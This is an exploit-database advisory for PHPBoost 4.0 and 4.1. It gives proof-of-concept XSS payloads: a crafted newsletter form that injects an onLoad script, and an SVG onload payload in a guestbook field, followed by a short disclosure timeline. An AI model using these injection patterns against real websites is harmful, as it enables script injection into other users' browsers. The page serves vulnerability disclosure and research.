[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPBoost 4.0 & 4.1 - XSS Reflected Vulnerability

Author
ZwX
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-24409
Category
web applications
Date add
11-10-2015
Platform
php
#===================================#
# Title : PHPBoost 4.0 & 4.1 - XSS Reflected Vulnerability
# Author : ZwX
# Date : 04/02/2015
# Vendor : http://www.phpboost.com/
# Tested on : Windows 7
#===================================#

# Description #

an XSS Reflected vulnerability was detected  in the newsletter form


# Proof Of Concept #

<div id="newsletter">
<form action="http://127.0.01/projects/phpboost/newsletter/?url=/subscribe/" method="post">
<div class="newsletter-form input-element-button">
<span class="newsletter-title">Newsletter</span> 
<input type="text" name="mail_newsletter" maxlength="50" value="'"/><body onLoad="alert('xss');" placeholder="Email">
<input type="hidden" name="subscribe" value="subscribe">
<button type="submit" class="newsletter-submit"><i class="fa fa-envelope-o"></i></button>
</div></form>
</div>

# Description #

an XSS Stored vulnerability was detected  in the guestbook

<svg onload=alert('XSS')>

# Proof Of Concept # 

<div class="form-field">
<input type="text" size="30" maxlength="25" name="GuestbookFormController_pseudo" id="GuestbookFormController_pseudo" value="<svg onload=alert('XSS')>" class="" />
</div>

# followed discovery #

04/02/2015 - vulnerability discovery
04/02/2015 - get in contacted with the programmer
08/02/2015 - Bug Fixed


# Solution #

Udapte newsletter

#  0day.today [2024-11-15]  #